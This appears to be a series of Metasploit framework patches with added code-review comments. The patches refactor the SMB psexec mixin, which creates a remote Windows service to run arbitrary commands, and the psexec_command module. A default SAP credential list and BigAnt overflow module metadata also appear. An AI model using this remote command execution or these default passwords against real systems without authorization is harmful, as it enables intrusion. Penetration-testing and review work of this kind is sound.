+14,5 @@ J2EE_ADMIN ch4ngeme SAPJSF ch4ngeme SAPR3 SAP CTB_ADMIN sap123 -XMI_DEMO sap123 \ No newline at end of file +XMI_DEMO sap123 + From b72d2b59f84ae70978f416c65cf303f5fa3007f0 Mon Sep 17 00:00:00 2001 From: James Lee <egypt@metasploit.com> Date: Mon, 18 Feb 2013 18:02:51 -0600 Subject: [PATCH 415/421] Add logging in case of exceptions during rm --- lib/msf/core/exploit/file_dropper.rb | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/lib/msf/core/exploit/file_dropper.rb b/lib/msf/core/exploit/file_dropper.rb index 6298354b6795..12ef03efb204 100644 --- a/lib/msf/core/exploit/file_dropper.rb +++ b/lib/msf/core/exploit/file_dropper.rb 
@@ -56,7 +56,7 @@ def on_new_session(session) # # Record file as needing to be cleaned up # - # @param [Array<String>] files List of paths on the target that should + # @param files [Array<String>] List of paths on the target that should # be deleted during cleanup. Each filename should be either a full # path or relative to the current working directory of the session # (not necessarily the same as the cwd of the server we're @@ -95,7 +95,9 @@ def cleanup true #rescue ::Rex::SocketError, ::EOFError, ::IOError, ::Errno::EPIPE, ::Rex::Post::Meterpreter::RequestError => e rescue ::Exception => e - vprint_error("Failed to delete #{file}: #{e.to_s}") + vprint_error("Failed to delete #{file}: #{e}") + elog("Failed to delete #{file}: #{e.class}: #{e}") + elog("Call stack:\n#{e.backtrace.join("\n")}") false end end From 867ab2f269365d7c0de0591c2a96e64c7928d5d9 Mon Sep 17 00:00:00 2001 From: James Lee <egypt@metasploit.com> Date: Mon, 18 Feb 2013 19:01:03 -0600 Subject: [PATCH 416/421] Whitespace --- lib/rex/proto/smb/client.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/rex/proto/smb/client.rb b/lib/rex/proto/smb/client.rb index bec1ff50d54e..72c35379fbf0 100644 --- a/lib/rex/proto/smb/client.rb +++ b/lib/rex/proto/smb/client.rb @@ -1899,7 +1899,7 @@ def find_first(path) resp = find_next(last_search_id, last_offset, last_filename) search_next = 1 # Flip bit so response params will parse correctly end - end until eos != 0 or last_offset == 0 + end until eos != 0 or last_offset == 0 rescue ::Exception raise $! end From 49f00acc1187f38a55fcaa5cd31b081575dc19b3 Mon Sep 17 00:00:00 2001 From: James Lee <egypt@metasploit.com> Date: Tue, 19 Feb 2013 11:24:05 -0600 Subject: [PATCH 417/421] Fix nil deref when dnsdomain is empty --- modules/auxiliary/scanner/smb/psexec_loggedin_users.rb | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) 
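Review bot: The `rescue ::Exception => e` that the new `elog` calls sit under in `cleanup` also traps Interrupt and SystemExit, so a Ctrl-C during file removal is recorded as a failed delete and then swallowed. The commented-out rescue line directly above already names the expected socket and Meterpreter errors; restoring that list, or at least using `rescue ::StandardError => e`, keeps the new logging while letting signals through. A short why-comment on the two `elog` lines, e.g. `# full class and backtrace go to framework.log; the console only gets the summary`, would explain why the failure is reported twice. The enclosing method begins outside the hunk.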
diff --git a/modules/auxiliary/scanner/smb/psexec_loggedin_users.rb b/modules/auxiliary/scanner/smb/psexec_loggedin_users.rb index 7ed1b96f4dca..ca6c2f5c2f74 100644 --- a/modules/auxiliary/scanner/smb/psexec_loggedin_users.rb +++ b/modules/auxiliary/scanner/smb/psexec_loggedin_users.rb @@ -164,8 +164,10 @@ def check_hku_entry(key, ip, smbshare, cmd, text, bat) print_good("#{peer} - #{user}") report_user(user.chomp) else - if username = query_session(smbshare, ip, cmd, text, bat) - user = dnsdomain.split(" ")[2].split(".")[0].to_s + "\\" + username.to_s + username = query_session(smbshare, ip, cmd, text, bat) + if username + hostname = (dnsdomain.split(" ")[2] || "").split(".")[0] || "." + user = "#{hostname}\\#{username}" print_good("#{peer} - #{user}") report_user(user.chomp) else @@ -175,7 +177,7 @@ def check_hku_entry(key, ip, smbshare, cmd, text, bat) else print_status("#{peer} - Could not determine logged in users") end - rescue StandardError => check_error + rescue Rex::Proto::SMB::Exceptions::Error => check_error print_error("#{peer} - Error checking reg key. #{check_error.class}. #{check_error}") return check_error end From 9813c815efbe371ca711890ba84b636ca9fa0233 Mon Sep 17 00:00:00 2001 From: sinn3r <msfsinn3r@gmail.com> Date: Tue, 19 Feb 2013 11:40:06 -0600 Subject: [PATCH 418/421] Minor changes --- .../exploits/windows/misc/bigant_server_sch_dupf_bof.rb | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/modules/exploits/windows/misc/bigant_server_sch_dupf_bof.rb b/modules/exploits/windows/misc/bigant_server_sch_dupf_bof.rb index fd560463cd2e..f72d6c171d24 100644 --- a/modules/exploits/windows/misc/bigant_server_sch_dupf_bof.rb +++ b/modules/exploits/windows/misc/bigant_server_sch_dupf_bof.rb 
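Review bot: The new `hostname` expression in `check_hku_entry` still calls `dnsdomain.split` directly, so a nil `dnsdomain` (as opposed to an empty string) raises NoMethodError, and because the second hunk narrows the rescue to `Rex::Proto::SMB::Exceptions::Error` that error would now leave the method. `dnsdomain` is assigned outside the hunk; if nil is possible, use `hostname = (dnsdomain.to_s.split(" ")[2] || "").split(".")[0] || "."`. The rescue branch in the second hunk ends with `return check_error`, which hands the exception object back as a truthy value; returning nil would be less surprising to a caller that tests the result.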
@@ -14,15 +14,15 @@ class Metasploit3 < Msf::Exploit::Remote def initialize(info = {}) super(update_info(info, - 'Name' => 'BigAnt Server SCH And DUPF Buffer Overflow', + 'Name' => 'BigAnt Server 2 SCH And DUPF Buffer Overflow', 'Description' => %q{ - This exploits a stack buffer overflow in the BigAnt Server 2.97 SP7. The + This exploits a stack buffer overflow in BigAnt Server 2.97 SP7. The vulnerability is due to the dangerous usage of strcpy while handling errors. This - module uses a combination of SCH and DUPF request to trigger the vulnerability and + module uses a combination of SCH and DUPF request to trigger the vulnerability, and has been tested successfully against version 2.97 SP7 over Windows XP SP3 and Windows 2003 SP2. }, - 'Author' => + 'Author' => [ 'Hamburgers Maccoy', # Vulnerability discovery 'juan vazquez' # Metasploit module From 5108e8ef1ce3c7432eb85c8cc2de4d4fb803dac5 Mon Sep 17 00:00:00 2001 From: sinn3r <msfsinn3r@gmail.com> Date: Tue, 19 Feb 2013 11:44:41 -0600 Subject: [PATCH 419/421] Correct tab --- modules/exploits/windows/misc/bigant_server_dupf_upload.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/misc/bigant_server_dupf_upload.rb b/modules/exploits/windows/misc/bigant_server_dupf_upload.rb index bed756cb52aa..769d2e22527c 100644 --- a/modules/exploits/windows/misc/bigant_server_dupf_upload.rb +++ b/modules/exploits/windows/misc/bigant_server_dupf_upload.rb @@ -29,7 +29,7 @@ def initialize(info = {}) has been successfully tested on BigAnt Server 2.97 SP7 over Windows XP SP3 and 2003 SP2. }, - 'Author' => + 'Author' => [ 'Hamburgers Maccoy', # Vulnerability discovery 'juan vazquez' # Metasploit module From ede804e6affa6ae24e8c62a22e01430b3e6d6aed Mon Sep 17 00:00:00 2001 
From: James Lee <egypt@metasploit.com> Date: Tue, 19 Feb 2013 12:33:19 -0600 Subject: [PATCH 420/421] Make psexec mixin a bit better * Removes copy-pasted code from psexec_command module and uses the mixin instead * Uses the SMB protocol to delete files rather than psexec'ing to call cmd.exe and del * Replaces several instances of "rescue StandardError" with better exception handling so we don't accidentally swallow things like NoMethodError * Moves file reading and existence checking into the Exploit::SMB mixin --- lib/msf/core/exploit/psexec.rb | 139 ++++------- lib/msf/core/exploit/smb.rb | 66 +++++- modules/auxiliary/admin/smb/psexec_command.rb | 219 ++++-------------- 3 files changed, 148 insertions(+), 276 deletions(-) diff --git a/lib/msf/core/exploit/psexec.rb b/lib/msf/core/exploit/psexec.rb index f63a93f8e160..58e678869595 100644 --- a/lib/msf/core/exploit/psexec.rb +++ b/lib/msf/core/exploit/psexec.rb @@ -1,11 +1,14 @@ require 'msf/core' +require 'msf/core/exploit/dcerpc' module Msf #### -# This module alows for reuse of the psexec code execution module -# This code was stolen straight out of psexec.rb.Thanks very much for all -# who contributed to that module!! Instead of uploading and runing a binary. +# Allows for reuse of the psexec code execution technique +# +# This code was stolen straight out of the psexec module. Thanks very +# much for all who contributed to that module!! Instead of uploading +# and runing a binary. #### module Exploit::Remote::Psexec 
@@ -13,34 +16,42 @@ module Exploit::Remote::Psexec include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Remote::SMB - # Retrives output from the executed command + # # @param smbshare [String] The SMBshare to connect to. Usually C$ - # @param ip [IP Address] Remote Host to Connect To - # @param file [File name] Path to the output file relative to the smbshare - # Example: '\WINDOWS\Temp\outputfile.txt' - # @return output or nil if fails - def get_output(smbshare, ip, file) + # @param host [String] Remote host to connect to, as an IP address or + # hostname + # @param file [String] Path to the output file relative to the smbshare + # Example: '\WINDOWS\Temp\outputfile.txt' + # @return [String,nil] output or nil on failure + def smb_read_file(smbshare, host, file) begin - simple.connect("\\\\#{ip}\\#{smbshare}") - outfile = simple.open(file, 'ro') - output = outfile.read - outfile.close - simple.disconnect("\\\\#{ip}\\#{smbshare}") - return output - rescue Rex::Proto::SMB::Exceptions::ErrorCode => output_error - print_error("#{peer} - The file #{file} doesn't exist. #{output_error}.") + simple.connect("\\\\#{host}\\#{smbshare}") + file = simple.open(file, 'ro') + contents = file.read + file.close + simple.disconnect("\\\\#{host}\\#{smbshare}") + return contents + rescue Rex::Proto::SMB::Exceptions::ErrorCode => e + print_error("#{peer} - Unable to read file #{file}. #{e.class}: #{e}.") return nil end end - # This method executes a single windows command. If you want to - # retrieve the output of your command you'll have to echo it - # to a .txt file and then use the get_output method to retrieve it - # Make sure to use the cleanup_after method when you are done. + # Executes a single windows command. + # + # If you want to retrieve the output of your command you'll have to + # echo it to a .txt file and then use the {#smb_read_file} method to + # retrieve it. 
Make sure to remove the files manually or use + # {Exploit::FileDropper#register_files_for_cleanup} to have the + # {Exploit::FileDropper#cleanup} and + # {Exploit::FileDropper#on_new_session} handlers do it for you. + # + # @todo Figure out the actual exceptions this needs to deal with + # instead of all the ghetto "rescue ::Exception" madness # @param command [String] Should be a valid windows command - # @return true if everything wen't well + # @return [Boolean] Whether everything went well def psexec(command) simple.connect("\\\\#{datastore['RHOST']}\\IPC$") handle = dcerpc_handle('367abb81-9844-35f1-ad32-98f038001003', '2.0', 'ncacn_np', ["\\svcctl"]) @@ -49,8 +60,7 @@ def psexec(command) vprint_status("#{peer} - Bound to #{handle} ...") vprint_status("#{peer} - Obtaining a service manager handle...") scm_handle = nil - stubdata = - NDR.uwstring("\\\\#{rhost}") + NDR.long(0) + NDR.long(0xF003F) + stubdata = NDR.uwstring("\\\\#{rhost}") + NDR.long(0) + NDR.long(0xF003F) begin response = dcerpc.call(0x0f, stubdata) if dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil 
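Review bot: `smb_read_file` reassigns its `file` parameter to the handle returned by `simple.open`, so if `read` or `close` raises, the rescue message interpolates the handle object instead of the path, and neither the handle nor the share connection is released. Keep the path and the handle apart with `fd = simple.open(file, 'ro')` and `contents = fd.read`, and move `fd.close` and `simple.disconnect` into an `ensure`. Only `Rex::Proto::SMB::Exceptions::ErrorCode` is rescued, so the `@return [String,nil]` line should say that other SMB errors propagate to the caller. The doc comment now opens with an empty `#` line where the summary was removed; restore one such as `# Reads a file from an SMB share`.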
@@ -66,19 +76,19 @@ def psexec(command) svc_handle = nil svc_status = nil stubdata = - scm_handle + NDR.wstring(servicename) + NDR.uwstring(displayname) + - NDR.long(0x0F01FF) + # Access: MAX - NDR.long(0x00000110) + # Type: Interactive, Own process - NDR.long(0x00000003) + # Start: Demand - NDR.long(0x00000000) + # Errors: Ignore - NDR.wstring( command ) + - NDR.long(0) + # LoadOrderGroup - NDR.long(0) + # Dependencies - NDR.long(0) + # Service Start - NDR.long(0) + # Password - NDR.long(0) + # Password - NDR.long(0) + # Password - NDR.long(0) # Password + scm_handle + NDR.wstring(servicename) + NDR.uwstring(displayname) + + NDR.long(0x0F01FF) + # Access: MAX + NDR.long(0x00000110) + # Type: Interactive, Own process + NDR.long(0x00000003) + # Start: Demand + NDR.long(0x00000000) + # Errors: Ignore + NDR.wstring( command ) + + NDR.long(0) + # LoadOrderGroup + NDR.long(0) + # Dependencies + NDR.long(0) + # Service Start + NDR.long(0) + # Password + NDR.long(0) + # Password + NDR.long(0) + # Password + NDR.long(0) # Password begin vprint_status("#{peer} - Creating the service...") response = dcerpc.call(0x0c, stubdata) @@ -97,8 +107,7 @@ def psexec(command) end vprint_status("#{peer} - Opening service...") begin - stubdata = - scm_handle + NDR.wstring(servicename) + NDR.long(0xF01FF) + stubdata = scm_handle + NDR.wstring(servicename) + NDR.long(0xF01FF) response = dcerpc.call(0x10, stubdata) if dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil svc_handle = dcerpc.last_response.stub_data[0,20] @@ -108,8 +117,7 @@ def psexec(command) return false end vprint_status("#{peer} - Starting the service...") - stubdata = - svc_handle + NDR.long(0) + NDR.long(0) + stubdata = svc_handle + NDR.long(0) + NDR.long(0) begin response = dcerpc.call(0x13, stubdata) if dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil 
@@ -119,8 +127,7 @@ def psexec(command) return false end vprint_status("#{peer} - Removing the service...") - stubdata = - svc_handle + stubdata = svc_handle begin response = dcerpc.call(0x02, stubdata) if dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil @@ -139,52 +146,6 @@ def psexec(command) return true end - - # This method is called by file_dropper to remove files droped - # By your module - # - # @example - # file_rm('C:\WINDOWS\Temp\output.txt') - # - # @param file [String] Full path to a file on the remote host - # @return [StandardError] only in the event of an error - def file_rm(file) - delete = "%COMSPEC% /C del #{file}" - vprint_status("#{peer} - Deleting #{file}") - psexec(delete) - end - - - # This method stores files in an Instance array - # The files are then deleted from the remote host once - # the cleanup_after method is called - # - # @example - # register_file_for_cleanup("C:\\WINDOWS\\Temp\\output.txt") - # @param file [String] Full path to the file on the remote host - def register_file_for_cleanup(*file) - @dropped_files ||= [] - @dropped_files += file - end - - - # This method removes any files that were dropped on the remote system - # and marked with the register_file_for_cleanup method - def cleanup_after - print_status("#{peer} - Removing files dropped by your module/exploit") - if !@dropped_files - return - end - begin - @dropped_files.delete_if do |file| - file_rm(file) - print_good("#{peer} - Deleted #{file}") - end - rescue Rex::Proto::SMB::Exceptions::ErrorCode => cleanup_error - print_error("#{peer} - Unable to delte #{file}. #{cleanup_error}") - end - end - end end diff --git a/lib/msf/core/exploit/smb.rb b/lib/msf/core/exploit/smb.rb index 00f17808c106..f249af1ed23c 100644 --- a/lib/msf/core/exploit/smb.rb +++ b/lib/msf/core/exploit/smb.rb @@ -18,6 +18,8 @@ module Msf module Exploit::Remote::SMB + require 'msf/core/exploit/psexec' + include Exploit::Remote::Tcp include Exploit::Remote::NTLM::Client 
@@ -90,6 +92,13 @@ def initialize(info = {}) register_autofilter_services(%W{ netbios-ssn microsoft-ds }) end + # Override {Exploit::Remote::Tcp#connect} to setup an SMB connection + # and configure evasion options + # + # Also populates {#simple}. + # + # @param (see Exploit::Remote::Tcp#connect) + # @return (see Exploit::Remote::Tcp#connect) def connect(global=true) disconnect() if global @@ -132,7 +141,12 @@ def unicode(str) Rex::Text.to_unicode(str) end - # This method establishes a SMB session over the default socket + # Establishes an SMB session over the default socket and connects to + # the IPC$ share. + # + # You should call {#connect} before calling this + # + # @return [void] def smb_login simple.login( datastore['SMBName'], 
@@ -217,13 +231,55 @@ def splitname(uname) end end + # Whether a remote file exists + # + # @param file [String] Path to a file to remove, relative to the + # most-recently connected share + # @raise [Rex::Proto::SMB::Exceptions::ErrorCode] + def smb_file_exist?(file) + begin + fd = simple.open(file, 'ro') + rescue XCEPT::ErrorCode => e + # If attempting to open the file results in a "*_NOT_FOUND" error, + # then we can be sure the file is not there. + # + # Copy-pasted from smb/exceptions.rb to avoid the gymnastics + # required to pull them out of a giant inverted hash + # + # 0xC0000034 => "STATUS_OBJECT_NAME_NOT_FOUND", + # 0xC000003A => "STATUS_OBJECT_PATH_NOT_FOUND", + # 0xC0000225 => "STATUS_NOT_FOUND", + error_is_not_found = [ 0xC0000034, 0xC000003A, 0xC0000225 ].include?(e.error_code) + # If the server returns some other error, then there was a + # permissions problem or some other difficulty that we can't + # really account for and hope the caller can deal with it. + raise e unless error_is_not_found + found = !error_is_not_found + else + # There was no exception, so we know the file is openable + fd.close + found = true + end + + found + end + + # Remove remote file + # + # @param file (see #smb_file_exist?) + # @return [void] + def smb_file_rm(file) + fd = smb_open(file, 'ro') + fd.delete + end + # # Fingerprinting methods # - # This method the EnumPrinters() function of the spooler service + # Calls the EnumPrinters() function of the spooler service def smb_enumprinters(flags, name, level, blen) stub = NDR.long(flags) + @@ -632,10 +688,7 @@ def smb_fingerprint fprint end - # - # Accessors - # - + # @return [Rex::Proto::SMB::SimpleClient] attr_accessor :simple end @@ -785,7 +838,6 @@ def smb_error(cmd, c, errorclass, esn = false) c.put(pkt.to_s) end - end diff --git a/modules/auxiliary/admin/smb/psexec_command.rb b/modules/auxiliary/admin/smb/psexec_command.rb index 1bc21c97c359..15e51b112e3f 100644 --- a/modules/auxiliary/admin/smb/psexec_command.rb 
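Review bot: In `smb_file_exist?` the assignment `found = !error_is_not_found` is only reached when `error_is_not_found` is true, so it is always false, and the `found` local hides the fact that the method has just two outcomes; the form below says the same thing directly. Its `@param` text reads "Path to a file to remove", copied from the delete helper, and the method has no `@return [Boolean]` line. `smb_file_rm` goes through `smb_open(file, 'ro')` while `smb_file_exist?` uses `simple.open`; `smb_open` is defined outside the hunk, so either use the same call in both or add a comment saying why they differ and why a read-only open is enough for a delete.
```ruby
def smb_file_exist?(file)
  fd = simple.open(file, 'ro')
rescue XCEPT::ErrorCode => e
  # … unchanged: comment listing the three *_NOT_FOUND status codes …
  raise e unless [ 0xC0000034, 0xC000003A, 0xC0000225 ].include?(e.error_code)
  false
else
  # The open succeeded, so the file exists
  fd.close
  true
end
```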
+++ b/modules/auxiliary/admin/smb/psexec_command.rb @@ -4,12 +4,12 @@ class Metasploit3 < Msf::Auxiliary - # Exploit mixins should be called first + include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Remote::SMB include Msf::Exploit::Remote::SMB::Authenticated + include Msf::Exploit::Remote::Psexec include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner - include Msf::Exploit::Remote::DCERPC # Aliases for common classes SIMPLE = Rex::Proto::SMB::SimpleClient 
@@ -58,213 +58,72 @@ def peer # This is the main controle method def run_host(ip) text = "\\#{datastore['WINPATH']}\\Temp\\#{Rex::Text.rand_text_alpha(16)}.txt" - bat = "%WINDIR%\\Temp\\#{Rex::Text.rand_text_alpha(16)}.bat" - smbshare = datastore['SMBSHARE'] + bat = "\\#{datastore['WINPATH']}\\Temp\\#{Rex::Text.rand_text_alpha(16)}.bat" + @smbshare = datastore['SMBSHARE'] + @ip = ip - #Try and authenticate with given credentials + # Try and authenticate with given credentials if connect begin smb_login - rescue StandardError => autherror + rescue Rex::Proto::SMB::Exceptions::Error => autherror print_error("#{peer} - Unable to authenticate with given credentials: #{autherror}") return end - if execute_command(ip, text, bat) - get_output(smbshare, ip, text) + if execute_command(text, bat) + get_output(text) end - cleanup_after(smbshare, ip, text, bat) + cleanup_after(text, bat) disconnect end end # Executes specified Windows Command - def execute_command(ip, text, bat) + def execute_command(text, bat) + # Try and execute the provided command + execute = "%COMSPEC% /C echo #{datastore['COMMAND']} ^> %SYSTEMDRIVE%#{text} > #{bat} & %COMSPEC% /C start %COMSPEC% /C #{bat}" + print_status("#{peer} - Executing the command...") begin - #Try and execute the provided command - execute = "%COMSPEC% /C echo #{datastore['COMMAND']} ^> %SYSTEMDRIVE%#{text} > #{bat} & %COMSPEC% /C start cmd.exe /C #{bat}" - print_status("#{peer} - Executing the command...") return psexec(execute) - rescue StandardError => exec_command_error + rescue Rex::Proto::SMB::Exceptions::Error => exec_command_error print_error("#{peer} - Unable to execute specified command: #{exec_command_error}") return false end end # Retrive output from command - def get_output(smbshare, ip, file) - begin - print_status("#{peer} - Getting the command output...") - simple.connect("\\\\#{ip}\\#{smbshare}") - outfile = simple.open(file, 'ro') - output = outfile.read - outfile.close - 
simple.disconnect("\\\\#{ip}\\#{smbshare}") - if output.empty? - print_status("#{peer} - Command finished with no output") - return - end - print_good("#{peer} - Command completed successfuly! Output:\r\n#{output}") - return - rescue StandardError => output_error - print_error("#{peer} - Error getting command output. #{output_error.class}. #{output_error}.") + def get_output(file) + print_status("#{peer} - Getting the command output...") + output = smb_read_file(@smbshare, @ip, file) + if output.nil? + print_error("#{peer} - Error getting command output. #{$!.class}. #{$!}.") return end - end - - # This is the cleanup method, removes .txt and .bat file/s created during execution- - def cleanup_after(smbshare, ip, text, bat) - begin - # Try and do cleanup command - cleanup = "%COMSPEC% /C del %SYSTEMDRIVE%#{text} & del #{bat}" - print_status("#{peer} - Executing cleanup...") - psexec(cleanup) - if !check_cleanup(smbshare, ip, text) - print_error("#{peer} - Unable to cleanup. Maybe you'll need to manually remove #{text} and #{bat} from the target.") - else - print_status("#{peer} - Cleanup was successful") - end - rescue StandardError => cleanuperror - print_error("#{peer} - Unable to processes cleanup commands. Error: #{cleanuperror}") - print_error("#{peer} - Maybe you'll need to manually remove #{text} and #{bat} from the target") - return cleanuperror - end - end - - def check_cleanup(smbshare, ip, text) - simple.connect("\\\\#{ip}\\#{smbshare}") - begin - if checktext = simple.open(text, 'ro') - check = false - else - check = true - end - simple.disconnect("\\\\#{ip}\\#{smbshare}") - return check - rescue StandardError => check_error - simple.disconnect("\\\\#{ip}\\#{smbshare}") - return true + if output.empty? + print_status("#{peer} - Command finished with no output") + return end + print_good("#{peer} - Command completed successfuly! Output:") + print_line("#{output}") end - # This code was stolen straight out of psexec.rb. 
Thanks very much HDM and all who contributed to that module!! - # Instead of uploading and runing a binary. This method runs a single windows command fed into the COMMAND paramater - def psexec(command) - - simple.connect("\\\\#{datastore['RHOST']}\\IPC$") - - handle = dcerpc_handle('367abb81-9844-35f1-ad32-98f038001003', '2.0', 'ncacn_np', ["\\svcctl"]) - vprint_status("#{peer} - Binding to #{handle} ...") - dcerpc_bind(handle) - vprint_status("#{peer} - Bound to #{handle} ...") - - vprint_status("#{peer} - Obtaining a service manager handle...") - scm_handle = nil - stubdata = - NDR.uwstring("\\\\#{rhost}") + - NDR.long(0) + - NDR.long(0xF003F) - begin - response = dcerpc.call(0x0f, stubdata) - if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil) - scm_handle = dcerpc.last_response.stub_data[0,20] - end - rescue ::Exception => e - print_error("#{peer} - Error: #{e}") - return false - end - - servicename = Rex::Text.rand_text_alpha(11) - displayname = Rex::Text.rand_text_alpha(16) - holdhandle = scm_handle - svc_handle = nil - svc_status = nil - - stubdata = - scm_handle + - NDR.wstring(servicename) + - NDR.uwstring(displayname) + - - NDR.long(0x0F01FF) + # Access: MAX - NDR.long(0x00000110) + # Type: Interactive, Own process - NDR.long(0x00000003) + # Start: Demand - NDR.long(0x00000000) + # Errors: Ignore - NDR.wstring( command ) + - NDR.long(0) + # LoadOrderGroup - NDR.long(0) + # Dependencies - NDR.long(0) + # Service Start - NDR.long(0) + # Password - NDR.long(0) + # Password - NDR.long(0) + # Password - NDR.long(0) # Password - begin - vprint_status("#{peer} - Creating the service...") - response = dcerpc.call(0x0c, stubdata) - if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil) - svc_handle = dcerpc.last_response.stub_data[0,20] - svc_status = dcerpc.last_response.stub_data[24,4] - end - rescue ::Exception => e - print_error("#{peer} - Error: #{e}") - return false - end - - vprint_status("#{peer} - Closing 
service handle...") - begin - response = dcerpc.call(0x0, svc_handle) - rescue ::Exception - end - - vprint_status("#{peer} - Opening service...") - begin - stubdata = - scm_handle + - NDR.wstring(servicename) + - NDR.long(0xF01FF) - - response = dcerpc.call(0x10, stubdata) - if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil) - svc_handle = dcerpc.last_response.stub_data[0,20] - end - rescue ::Exception => e - print_error("#{peer} - Error: #{e}") - return false - end - - vprint_status("#{peer} - Starting the service...") - stubdata = - svc_handle + - NDR.long(0) + - NDR.long(0) - begin - response = dcerpc.call(0x13, stubdata) - if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil) - end - rescue ::Exception => e - print_error("#{peer} - Error: #{e}") - return false - end - - vprint_status("#{peer} - Removing the service...") - stubdata = - svc_handle - begin - response = dcerpc.call(0x02, stubdata) - if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil) + # Removes files created during execution. + def cleanup_after(*files) + simple.connect("\\\\#{@ip}\\#{@smbshare}") + print_status("#{peer} - Executing cleanup...") + files.each do |file| + begin + smb_file_rm(file) + rescue Rex::Proto::SMB::Exceptions::ErrorCode => cleanuperror + print_error("#{peer} - Unable to cleanup #{file}. Error: #{cleanuperror}") end - rescue ::Exception => e - print_error("#{peer} - Error: #{e}") end - - vprint_status("#{peer} - Closing service handle...") - begin - response = dcerpc.call(0x0, svc_handle) - rescue ::Exception => e - print_error("#{peer} - Error: #{e}") + left = files.collect{ |f| smb_file_exist?(f) } + if left.any? + print_error("#{peer} - Unable to cleanup. Maybe you'll need to manually remove #{left.join(", ")} from the target.") + else + print_status("#{peer} - Cleanup was successful") end - - select(nil, nil, nil, 1.0) - simple.disconnect("\\\\#{datastore['RHOST']}\\IPC$") - return true end end 
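Review bot: In `cleanup_after`, `left = files.collect{ |f| smb_file_exist?(f) }` builds an array of booleans, so `left.any?` works but the "manually remove" message prints `true, false` instead of the paths still on the target; `left = files.select { |f| smb_file_exist?(f) }` keeps the names. That check can also raise, because `smb_file_exist?` re-raises any status other than the three not-found codes and nothing rescues it here, and the share opened with `simple.connect` is never disconnected in this method. In `get_output`, the nil branch formats `$!`, but Ruby resets `$!` once a rescue clause has finished, so if `smb_read_file` (not shown in this hunk) rescues internally the message would read `NilClass. .`; reporting the exception where it is caught would preserve the cause. Accurate reporting matters here because the two temp files hold the command and its output, and the operator needs to know exactly which ones were left behind.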
From 4703278183733aae69839846bbdb20a2adaaa6f0 Mon Sep 17 00:00:00 2001 From: James Lee <egypt@metasploit.com> Date: Tue, 19 Feb 2013 12:55:06 -0600 Subject: [PATCH 421/421] Move SMB mixins into their own directory --- lib/msf/core/exploit/dcerpc.rb | 2 +- lib/msf/core/exploit/smb.rb | 18 ++------------- lib/msf/core/exploit/smb/authenticated.rb | 22 +++++++++++++++++++ lib/msf/core/exploit/{ => smb}/psexec.rb | 5 +++-- modules/auxiliary/admin/smb/psexec_command.rb | 4 +--- 5 files changed, 29 insertions(+), 22 deletions(-) create mode 100644 lib/msf/core/exploit/smb/authenticated.rb rename lib/msf/core/exploit/{ => smb}/psexec.rb (97%) diff --git a/lib/msf/core/exploit/dcerpc.rb b/lib/msf/core/exploit/dcerpc.rb index 51b11c738bc5..ff700984bea9 100644 --- a/lib/msf/core/exploit/dcerpc.rb +++ b/lib/msf/core/exploit/dcerpc.rb @@ -21,7 +21,7 @@ module Exploit::Remote::DCERPC DCERPCPacket = Rex::Proto::DCERPC::Packet DCERPCClient = Rex::Proto::DCERPC::Client DCERPCResponse = Rex::Proto::DCERPC::Response - DCERPCUUID = Rex::Proto::DCERPC::UUID + DCERPCUUID = Rex::Proto::DCERPC::UUID NDR = Rex::Encoder::NDR diff --git a/lib/msf/core/exploit/smb.rb b/lib/msf/core/exploit/smb.rb index f249af1ed23c..6e24ea986eca 100644 --- a/lib/msf/core/exploit/smb.rb +++ b/lib/msf/core/exploit/smb.rb @@ -4,7 +4,6 @@ require 'rex/proto/dcerpc' require 'rex/encoder/ndr' - module Msf ### @@ -18,7 +17,8 @@ module Msf module Exploit::Remote::SMB - require 'msf/core/exploit/psexec' + require 'msf/core/exploit/smb/authenticated' + require 'msf/core/exploit/smb/psexec' include Exploit::Remote::Tcp include Exploit::Remote::NTLM::Client 
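Review bot: The two new `require` lines sit above `include Exploit::Remote::Tcp` and `include Exploit::Remote::NTLM::Client` inside `module Exploit::Remote::SMB`, while the new smb/authenticated.rb (added in the following hunks) runs `include Msf::Exploit::Remote::SMB` as soon as it is loaded. On Ruby versions before 3.0, a module included into `SMB` after that point is not propagated to modules that already included `SMB`, so `Authenticated` may end up without the Tcp and NTLM client ancestors when smb.rb is the file that triggers the load. Moving the two requires below the `include` lines, or to the end of the `SMB` module body, would remove the dependence on load order; this should be confirmed against how the framework actually loads these files. psexec_command.rb now reaches `SMB` only through `SMB::Psexec`, so it is the first module to check.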
@@ -35,20 +35,6 @@ module Exploit::Remote::SMB DCERPCUUID = Rex::Proto::DCERPC::UUID NDR = Rex::Encoder::NDR - # Mini-mixin for making SMBUser/SMBPass/SMBDomain regular options vs advanced - # Included when the module needs credentials to function - module Authenticated - def initialize(info = {}) - super - register_options( - [ - OptString.new('SMBUser', [ false, 'The username to authenticate as', '']), - OptString.new('SMBPass', [ false, 'The password for the specified username', '']), - OptString.new('SMBDomain', [ false, 'The Windows domain to use for authentication', 'WORKGROUP']), - ], Msf::Exploit::Remote::SMB::Authenticated) - end - end - def initialize(info = {}) super diff --git a/lib/msf/core/exploit/smb/authenticated.rb b/lib/msf/core/exploit/smb/authenticated.rb new file mode 100644 index 000000000000..62bfdd470392 --- /dev/null +++ b/lib/msf/core/exploit/smb/authenticated.rb @@ -0,0 +1,22 @@ +# -*- coding: binary -*- + +module Msf + +# Mini-mixin for making SMBUser/SMBPass/SMBDomain regular options vs advanced +# Included when the module needs credentials to function +module Exploit::Remote::SMB::Authenticated + + include Msf::Exploit::Remote::SMB + + def initialize(info = {}) + super + register_options( + [ + OptString.new('SMBUser', [ false, 'The username to authenticate as', '']), + OptString.new('SMBPass', [ false, 'The password for the specified username', '']), + 